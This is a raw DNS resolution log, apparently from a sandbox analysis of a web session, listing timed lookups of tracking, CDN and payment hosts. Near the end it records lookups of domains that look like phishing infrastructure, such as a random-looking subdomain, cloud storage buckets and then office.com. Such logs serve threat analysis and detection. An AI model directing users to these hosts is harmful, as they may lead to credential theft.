                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.716902018 CET1.1.1.1192.168.2.160xee8eNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.717468023 CET1.1.1.1192.168.2.160x64f4No error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.804555893 CET1.1.1.1192.168.2.160x2984No error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.839380980 CET1.1.1.1192.168.2.160x6da5No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.839380980 CET1.1.1.1192.168.2.160x6da5No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.840024948 CET1.1.1.1192.168.2.160x4f69No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.840024948 CET1.1.1.1192.168.2.160x4f69No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.840024948 CET1.1.1.1192.168.2.160x4f69No error (0)s.twitter.com104.244.42.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.883930922 CET1.1.1.1192.168.2.160xaf0eNo error (0)google.com172.217.17.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.884082079 CET1.1.1.1192.168.2.160xa1acNo error (0)google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.893238068 CET1.1.1.1192.168.2.160x5d23No error (0)cdn.siftscience.comcdn.prod.gcp.sift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.920685053 CET1.1.1.1192.168.2.160x3f27No error (0)cdn.siftscience.comcdn.prod.gcp.sift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.920685053 CET1.1.1.1192.168.2.160x3f27No error (0)cdn.prod.gcp.sift.com34.96.67.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.629193068 CET1.1.1.1192.168.2.160xff4eNo error (0)t.co162.159.140.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.845768929 CET1.1.1.1192.168.2.160x434bNo error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.845768929 CET1.1.1.1192.168.2.160x434bNo error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.845768929 CET1.1.1.1192.168.2.160x434bNo error (0)s.twitter.com104.244.42.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.845768929 CET1.1.1.1192.168.2.160x434bNo error (0)s.twitter.com104.244.42.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.845768929 CET1.1.1.1192.168.2.160x434bNo error (0)s.twitter.com104.244.42.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.845768929 CET1.1.1.1192.168.2.160x434bNo error (0)s.twitter.com104.244.42.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.846328020 CET1.1.1.1192.168.2.160xd203No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.846328020 CET1.1.1.1192.168.2.160xd203No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.851846933 CET1.1.1.1192.168.2.160x4dc6No error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.851846933 CET1.1.1.1192.168.2.160x4dc6No error (0)spdc-global.pbp.gysm.yahoodns.net54.171.122.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.851846933 CET1.1.1.1192.168.2.160x4dc6No error (0)spdc-global.pbp.gysm.yahoodns.net54.246.144.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.852654934 CET1.1.1.1192.168.2.160x32a1No error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.902308941 CET1.1.1.1192.168.2.160xd4a5No error (0)pixels.spotify.comedge-web.dual-gslb.spotify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.902884960 CET1.1.1.1192.168.2.160x385cNo error (0)pixels.spotify.comedge-web.dual-gslb.spotify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.902884960 CET1.1.1.1192.168.2.160x385cNo error (0)edge-web.dual-gslb.spotify.com35.186.224.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.094669104 CET1.1.1.1192.168.2.160x7c2eNo error (0)cdn.siftscience.comcdn.prod.gcp.sift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.094669104 CET1.1.1.1192.168.2.160x7c2eNo error (0)cdn.prod.gcp.sift.com34.96.67.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.095387936 CET1.1.1.1192.168.2.160xd4fNo error (0)cdn.siftscience.comcdn.prod.gcp.sift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.917875051 CET1.1.1.1192.168.2.160xe93bNo error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.917875051 CET1.1.1.1192.168.2.160xe93bNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.917875051 CET1.1.1.1192.168.2.160xe93bNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.917875051 CET1.1.1.1192.168.2.160xe93bNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.917875051 CET1.1.1.1192.168.2.160xe93bNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.919229031 CET1.1.1.1192.168.2.160xd95eNo error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.771501064 CET1.1.1.1192.168.2.160x831aNo error (0)googleads.g.doubleclick.net172.217.19.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.772927046 CET1.1.1.1192.168.2.160xe522No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.773674965 CET1.1.1.1192.168.2.160xd9b5No error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.773674965 CET1.1.1.1192.168.2.160xd9b5No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.773674965 CET1.1.1.1192.168.2.160xd9b5No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.773674965 CET1.1.1.1192.168.2.160xd9b5No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.773674965 CET1.1.1.1192.168.2.160xd9b5No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.851871967 CET1.1.1.1192.168.2.160xdb68No error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.911827087 CET1.1.1.1192.168.2.160xcfbaNo error (0)sentry.io35.186.247.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.007591009 CET1.1.1.1192.168.2.160xe0bdNo error (0)m.stripe.networkprod-m-tree.stripe.networkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.007591009 CET1.1.1.1192.168.2.160xe0bdNo error (0)prod-m-tree.stripe.networkstripecdn.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.007843018 CET1.1.1.1192.168.2.160xcf6cNo error (0)m.stripe.networkprod-m-tree.stripe.networkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.007843018 CET1.1.1.1192.168.2.160xcf6cNo error (0)prod-m-tree.stripe.networkd1tcqh4bio8cty.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.007843018 CET1.1.1.1192.168.2.160xcf6cNo error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.007843018 CET1.1.1.1192.168.2.160xcf6cNo error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.007843018 CET1.1.1.1192.168.2.160xcf6cNo error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.007843018 CET1.1.1.1192.168.2.160xcf6cNo error (0)d1tcqh4bio8cty.cloudfront.net52.222.144.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.498701096 CET1.1.1.1192.168.2.160x5ab8No error (0)m.stripe.com35.164.166.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.498701096 CET1.1.1.1192.168.2.160x5ab8No error (0)m.stripe.com54.213.161.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.498701096 CET1.1.1.1192.168.2.160x5ab8No error (0)m.stripe.com52.25.68.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.498701096 CET1.1.1.1192.168.2.160x5ab8No error (0)m.stripe.com44.225.179.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.498701096 CET1.1.1.1192.168.2.160x5ab8No error (0)m.stripe.com52.34.30.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.498701096 CET1.1.1.1192.168.2.160x5ab8No error (0)m.stripe.com44.235.138.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.498701096 CET1.1.1.1192.168.2.160x5ab8No error (0)m.stripe.com54.213.186.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.498701096 CET1.1.1.1192.168.2.160x5ab8No error (0)m.stripe.com52.89.181.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.083758116 CET1.1.1.1192.168.2.160xc4e7No error (0)doclinere.info172.67.135.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.083758116 CET1.1.1.1192.168.2.160xc4e7No error (0)doclinere.info104.21.6.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.084685087 CET1.1.1.1192.168.2.160x9e29No error (0)doclinere.info65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.805548906 CET1.1.1.1192.168.2.160xabb6No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.805639029 CET1.1.1.1192.168.2.160x8257No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.807641029 CET1.1.1.1192.168.2.160xc39bNo error (0)stats.g.doubleclick.net64.233.167.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.807641029 CET1.1.1.1192.168.2.160xc39bNo error (0)stats.g.doubleclick.net64.233.167.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.807641029 CET1.1.1.1192.168.2.160xc39bNo error (0)stats.g.doubleclick.net64.233.167.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.807641029 CET1.1.1.1192.168.2.160xc39bNo error (0)stats.g.doubleclick.net64.233.167.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.809514999 CET1.1.1.1192.168.2.160x63fbNo error (0)hexagon-analytics.com34.102.232.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.811225891 CET1.1.1.1192.168.2.160x38bbNo error (0)sentry.io35.186.247.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:44.649089098 CET1.1.1.1192.168.2.160x6111No error (0)googleads.g.doubleclick.net172.217.17.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:44.649101973 CET1.1.1.1192.168.2.160x5c1fNo error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.048703909 CET1.1.1.1192.168.2.160xd3b8No error (0)m.stripe.com35.164.166.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.048703909 CET1.1.1.1192.168.2.160xd3b8No error (0)m.stripe.com54.213.161.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.048703909 CET1.1.1.1192.168.2.160xd3b8No error (0)m.stripe.com52.25.68.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.048703909 CET1.1.1.1192.168.2.160xd3b8No error (0)m.stripe.com44.225.179.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.048703909 CET1.1.1.1192.168.2.160xd3b8No error (0)m.stripe.com52.34.30.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.048703909 CET1.1.1.1192.168.2.160xd3b8No error (0)m.stripe.com54.213.186.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.048703909 CET1.1.1.1192.168.2.160xd3b8No error (0)m.stripe.com52.89.181.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.048703909 CET1.1.1.1192.168.2.160xd3b8No error (0)m.stripe.com44.235.138.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.697592974 CET1.1.1.1192.168.2.160x4fd4No error (0)hexagon-analytics.com34.102.232.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:47.670149088 CET1.1.1.1192.168.2.160xb2c1No error (0)stripe.com52.30.58.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:47.670149088 CET1.1.1.1192.168.2.160xb2c1No error (0)stripe.com52.49.17.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:47.670149088 CET1.1.1.1192.168.2.160xb2c1No error (0)stripe.com18.202.131.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:48.980963945 CET1.1.1.1192.168.2.160xf1fdNo error (0)tattle.api.osano.com52.87.69.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:48.980963945 CET1.1.1.1192.168.2.160xf1fdNo error (0)tattle.api.osano.com52.205.232.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.374370098 CET1.1.1.1192.168.2.160x606No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.374370098 CET1.1.1.1192.168.2.160x606No error (0)star-mini.c10r.facebook.com157.240.195.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.374670982 CET1.1.1.1192.168.2.160x5ec5No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.374670982 CET1.1.1.1192.168.2.160x5ec5No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.374670982 CET1.1.1.1192.168.2.160x5ec5No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.822545052 CET1.1.1.1192.168.2.160x781bNo error (0)pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.822545052 CET1.1.1.1192.168.2.160x781bNo error (0)pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:52.445450068 CET1.1.1.1192.168.2.160xf2f0No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:52.445450068 CET1.1.1.1192.168.2.160xf2f0No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:52.445450068 CET1.1.1.1192.168.2.160xf2f0No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:52.445475101 CET1.1.1.1192.168.2.160xd623No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:52.445475101 CET1.1.1.1192.168.2.160xd623No error (0)star-mini.c10r.facebook.com157.240.195.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:53.189687967 CET1.1.1.1192.168.2.160x71acNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:53.189687967 CET1.1.1.1192.168.2.160x71acNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:53.190493107 CET1.1.1.1192.168.2.160x14fcNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:54.887943029 CET1.1.1.1192.168.2.160xdb4bNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:54.888164043 CET1.1.1.1192.168.2.160xa7edNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:55.418234110 CET1.1.1.1192.168.2.160xef67No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:55.418234110 CET1.1.1.1192.168.2.160xef67No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:55.420291901 CET1.1.1.1192.168.2.160x3435No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:55.683823109 CET1.1.1.1192.168.2.160xcf38No error (0)rphfymzrfvbgvnwbxgqz.constructappsolution.com104.21.89.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:55.683823109 CET1.1.1.1192.168.2.160xcf38No error (0)rphfymzrfvbgvnwbxgqz.constructappsolution.com172.67.157.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:55.684266090 CET1.1.1.1192.168.2.160x57d7No error (0)rphfymzrfvbgvnwbxgqz.constructappsolution.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.238421917 CET1.1.1.1192.168.2.160x4aa3No error (0)rphfymzrfvbgvnwbxgqz.constructappsolution.com172.67.157.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.238421917 CET1.1.1.1192.168.2.160x4aa3No error (0)rphfymzrfvbgvnwbxgqz.constructappsolution.com104.21.89.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.239480019 CET1.1.1.1192.168.2.160x622eNo error (0)rphfymzrfvbgvnwbxgqz.constructappsolution.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.330070972 CET1.1.1.1192.168.2.160x34baNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.330070972 CET1.1.1.1192.168.2.160x34baNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.330070972 CET1.1.1.1192.168.2.160x34baNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.330070972 CET1.1.1.1192.168.2.160x34baNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.330709934 CET1.1.1.1192.168.2.160xe586No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.330709934 CET1.1.1.1192.168.2.160xe586No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.330959082 CET1.1.1.1192.168.2.160xba2dNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.333703995 CET1.1.1.1192.168.2.160xe30bNo error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.333796978 CET1.1.1.1192.168.2.160x25b2No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.333796978 CET1.1.1.1192.168.2.160x25b2No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.813589096 CET1.1.1.1192.168.2.160xb70eNo error (0)drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.comcos.na-siliconvalley.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.813589096 CET1.1.1.1192.168.2.160xb70eNo error (0)cos.na-siliconvalley.myqcloud.com170.106.97.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.813589096 CET1.1.1.1192.168.2.160xb70eNo error (0)cos.na-siliconvalley.myqcloud.com170.106.97.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.813589096 CET1.1.1.1192.168.2.160xb70eNo error (0)cos.na-siliconvalley.myqcloud.com170.106.97.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.471199036 CET1.1.1.1192.168.2.160xd6adNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.471199036 CET1.1.1.1192.168.2.160xd6adNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.471482992 CET1.1.1.1192.168.2.160x18f4No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.536437035 CET1.1.1.1192.168.2.160xe0f9No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.536437035 CET1.1.1.1192.168.2.160xe0f9No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.536629915 CET1.1.1.1192.168.2.160xd98fNo error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.554234982 CET1.1.1.1192.168.2.160x5cdNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.554234982 CET1.1.1.1192.168.2.160x5cdNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.554234982 CET1.1.1.1192.168.2.160x5cdNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.554234982 CET1.1.1.1192.168.2.160x5cdNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:02.845166922 CET1.1.1.1192.168.2.160xc775No error (0)office.com13.107.6.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.489042997 CET1.1.1.1192.168.2.160x4f28No error (0)drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.comcos.na-siliconvalley.myqcloud.comCNAME (Canonical name)IN (0x0001)false
